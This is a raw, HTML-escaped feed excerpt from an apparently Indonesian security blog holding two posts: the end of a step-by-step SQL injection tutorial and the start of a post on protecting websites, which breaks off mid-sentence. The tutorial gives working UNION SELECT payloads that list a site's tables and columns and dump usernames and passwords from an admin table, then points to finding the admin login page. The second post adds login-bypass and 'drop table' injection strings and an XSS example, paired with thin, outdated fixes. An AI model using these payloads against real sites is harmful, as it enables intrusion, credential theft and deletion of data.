&lt;span class="Apple-style-span" style="color: white;"&gt;=step Lima:=&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: white;"&gt;===========&lt;/span&gt;&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;&lt;span class="Apple-style-span" style="color: white;"&gt;untuk menampilkan semua isi dari table tsb adalah&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: white;"&gt;perintah group_concat(table_name) &amp;gt;&amp;gt;&amp;gt; dimasukan pada angka yg keluar tadi&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: white;"&gt;perintah +from+information_schema.tables+where+table_schema =database() &amp;gt;&amp;gt;&amp;gt; dimasukan setelah angka terakhir&lt;/span&gt;&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;&lt;span class="Apple-style-span" style="color: white;"&gt;[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name), 6,7,8+from+information_schema.tables+where+table_s chema=database()–&lt;/span&gt;&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;&lt;span class="Apple-style-span" style="color: white;"&gt;=============&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: white;"&gt;= step Enam: =&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: white;"&gt;=============&lt;/span&gt;&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;&lt;span class="Apple-style-span" style="color: white;"&gt;perintah group_concat(column_name) &amp;gt;&amp;gt;&amp;gt; dimasukan pada angka yg keluar tadi&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: white;"&gt;perintah +from+information_schema.columns+where+table_name= 0xhexa– &amp;gt;&amp;gt;&amp;gt; dimasukan setelah angka terakhir&lt;/span&gt;&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;&lt;span class="Apple-style-span" style="color: white;"&gt;[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name) ,6,7,8+from+information_schema.columns+where+table _name=0xhexa–&lt;/span&gt;&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;&lt;span class="Apple-style-span" style="color: white;"&gt;pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: white;"&gt;website yg digunakan untuk konversi :&lt;/span&gt;&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;&lt;span class="Apple-style-span" style="color: white;"&gt;http://www.v3n0m.net/ascii.htm&lt;/span&gt;&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;&lt;span class="Apple-style-span" style="color: white;"&gt;contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E&lt;/span&gt;&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;&lt;span class="Apple-style-span" style="color: white;"&gt;[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name) ,6,7,8+from+information_schema.columns+where+table _name=0x61646D696E–&lt;/span&gt;&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;&lt;span class="Apple-style-span" style="color: white;"&gt;============&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: white;"&gt;=step Tujuh:=&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: white;"&gt;============&lt;/span&gt;&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;&lt;span class="Apple-style-span" style="color: white;"&gt;memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara&lt;/span&gt;&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;&lt;span class="Apple-style-span" style="color: white;"&gt;perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) &amp;gt;&amp;gt;&amp;gt; dimasukan pada angka yg keluar tadi&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: white;"&gt;perintah +from+(nama table berasal) &amp;gt;&amp;gt;&amp;gt; dimasukan setelah angka terakhir&lt;/span&gt;&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;&lt;span class="Apple-style-span" style="color: white;"&gt;Contoh :&lt;/span&gt;&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;&lt;span class="Apple-style-span" style="color: white;"&gt;[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)–&lt;/span&gt;&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;&lt;span class="Apple-style-span" style="color: white;"&gt;contoh kata yang keluar adalah id,username,password&lt;/span&gt;&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;&lt;span class="Apple-style-span" style="color: white;"&gt;Contoh :&lt;/span&gt;&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;&lt;span class="Apple-style-span" style="color: white;"&gt;[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,usernam e,password),6,7,8+from+admin–&lt;/span&gt;&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;&lt;span class="Apple-style-span" style="color: white;"&gt;==============&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: white;"&gt;= step Delapan:=&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: white;"&gt;==============&lt;/span&gt;&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;&lt;span class="Apple-style-span" style="color: white;"&gt;tahap terakhir mencari halam admin atau login .&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3900780076543133178-456229933333975340?l=sxcode.blogspot.com' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/SecurityBlog?a=Ab2m5o0sQtc:PIdXsFoLIaE:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SecurityBlog?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SecurityBlog?a=Ab2m5o0sQtc:PIdXsFoLIaE:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SecurityBlog?i=Ab2m5o0sQtc:PIdXsFoLIaE:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SecurityBlog?a=Ab2m5o0sQtc:PIdXsFoLIaE:dnMXMwOfBR0"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SecurityBlog?d=dnMXMwOfBR0" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SecurityBlog?a=Ab2m5o0sQtc:PIdXsFoLIaE:YwkR-u9nhCs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SecurityBlog?d=YwkR-u9nhCs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SecurityBlog?a=Ab2m5o0sQtc:PIdXsFoLIaE:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SecurityBlog?i=Ab2m5o0sQtc:PIdXsFoLIaE:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SecurityBlog?a=Ab2m5o0sQtc:PIdXsFoLIaE:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SecurityBlog?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SecurityBlog?a=Ab2m5o0sQtc:PIdXsFoLIaE:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SecurityBlog?i=Ab2m5o0sQtc:PIdXsFoLIaE:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SecurityBlog?a=Ab2m5o0sQtc:PIdXsFoLIaE:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SecurityBlog?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SecurityBlog?a=Ab2m5o0sQtc:PIdXsFoLIaE:KwTdNBX3Jqk"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SecurityBlog?i=Ab2m5o0sQtc:PIdXsFoLIaE:KwTdNBX3Jqk" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SecurityBlog?a=Ab2m5o0sQtc:PIdXsFoLIaE:l6gmwiTKsz0"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SecurityBlog?d=l6gmwiTKsz0" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SecurityBlog?a=Ab2m5o0sQtc:PIdXsFoLIaE:TzevzKxY174"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SecurityBlog?d=TzevzKxY174" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SecurityBlog?a=Ab2m5o0sQtc:PIdXsFoLIaE:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SecurityBlog?i=Ab2m5o0sQtc:PIdXsFoLIaE:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SecurityBlog/~4/Ab2m5o0sQtc" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2011-07-27T01:04:37.678-07:00</app:edited><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://sxcode.blogspot.com/2011/07/tutorial-sql-injection-step-by-step.html</feedburner:origLink></item><item><title>Proteksi website dari para attacker</title><link>http://feedproxy.google.com/~r/SecurityBlog/~3/buAc4Nvb5zI/proteksi-website-dari-para-attacker.html</link><category>Tips - Triks</category><author>noreply@blogger.com (Bajingan)</author><pubDate>Wed, 27 Jul 2011 00:54:02 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-3900780076543133178.post-2236140815105533209</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;span class="Apple-style-span" style="color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21px;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;Konten :&lt;br /&gt;
[1] Pendahuluan&lt;br /&gt;
[2] Cross Site Scripting&lt;br /&gt;
[3] SQL Injection&lt;br /&gt;
\_ Login Form Bypassing&lt;br /&gt;
\_ UNION SQL Injection&lt;br /&gt;
[3] File Inclusion&lt;br /&gt;
[4] Special Thanks&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;[1] Pendahuluan&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;Artikel ini akan berisi tentang empat jenis serangan web umum dan pencegahannya, yang digunakan&lt;br /&gt;
di sebagian besar jenis defacement. Lima eksploitasi umum yang saya cantumkan di bawah ini&lt;br /&gt;
adalah XSS, SQL injection, RFI dan LFI. Sebagian besar kesalahan terjadi pada pemrograman&lt;br /&gt;
yang memungkinkan attacker untuk dapat menyusup ke dalam website.&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;[2] Cross Site Scripting&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;Cross Site Scripting adalah jenis celah yang digunakan oleh attacker untuk menyuntikkan kode ke halaman&lt;br /&gt;
web yang rentan terhadap serangan ini. Jika sebuah situs rentan terhadap cross site scripting, attacker&lt;br /&gt;
kemungkinan besar akan mencoba untuk menyuntikkan situs dengan javascript berbahaya atau mencoba scam pengguna&lt;br /&gt;
dengan menciptakan bentuk halaman web yang hampir sama untuk mendapatkan informasi.&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;Example:&lt;br /&gt;
http://www.sites.net/find.php?all=”&amp;gt;&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;*Solusi (javascript) :&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;function RemoveBad(strTemp) {&lt;br /&gt;
strTemp = strTemp.replace(/\&amp;lt;|\&amp;gt;|\”|\’|\%|\;|\(|\)|\&amp;amp;|\+|\-/g,”");&lt;br /&gt;
return strTemp;&lt;br /&gt;
}&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;[3] SQL Injection&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;*\_ Login Form Bypassing&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;Berikut adalah contoh kode yang dapat kita bisa bypass:&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;index.html file:&lt;br /&gt;
&amp;lt;form action=”login.php” method=”POST” /&amp;gt;&lt;br /&gt;
&amp;lt;p&amp;gt;Password: &amp;lt;input type=”text” name=”pass” /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;input type=”submit” value=”Authenticate” /&amp;gt;&amp;lt;/p&amp;gt;&lt;br /&gt;
&amp;lt;/form&amp;gt;&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;login.php file:&lt;br /&gt;
&amp;lt;?php&lt;br /&gt;
// Contoh Kode&lt;br /&gt;
$execute = “SELECT * from database WHERE password = ‘{$_POST['pass'])”;&lt;br /&gt;
$result = mysql_query($execute);&lt;br /&gt;
?&amp;gt;&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;Kita dapat bypass dengan menggunakan ‘ or ’1=1′, dan menjalankan “password = ”or ’1=1”;”.&lt;br /&gt;
Atau attacker dapat juga dapat menghapus database dengan menjalankan “‘ drop table database; –”.&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;*Solusi :&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;Menggunakan mysql_real_escape_string&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;Contoh:&lt;br /&gt;
&amp;lt;?php&lt;br /&gt;
$badcode = “‘ OR 1 ‘”;&lt;br /&gt;
$badcode = mysql_real_escape_string($badcode);&lt;br /&gt;
$message = “SELECT * from database WHERE password = “‘$badcode’”;&lt;br /&gt;
echo “what are doing nobs” . $message . “;&lt;br /&gt;
?&amp;gt;&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;*\_ Union SQL Injection&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;Union SQL injection adalah ketika pengguna menggunakan perintah UNION. Memeriksa celah dengan menambahkannya&lt;br /&gt;
di akhir url “sebuah php?.id=”. Jika terdapat error MySQL, situs tersebut kemungkinan besar&lt;br /&gt;
besar rentan terhadap UNION SQL Injection. Attacker melanjutkan menggunakan ORDER BY untuk menemukan kolom,&lt;br /&gt;
dan pada akhirnya, mereka menggunakan perintah UNION ALL SELECT.&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;Contoh :&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;http://www.sites.net/index.php?id=1′&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;salah satu contoh pesan error:&lt;br /&gt;
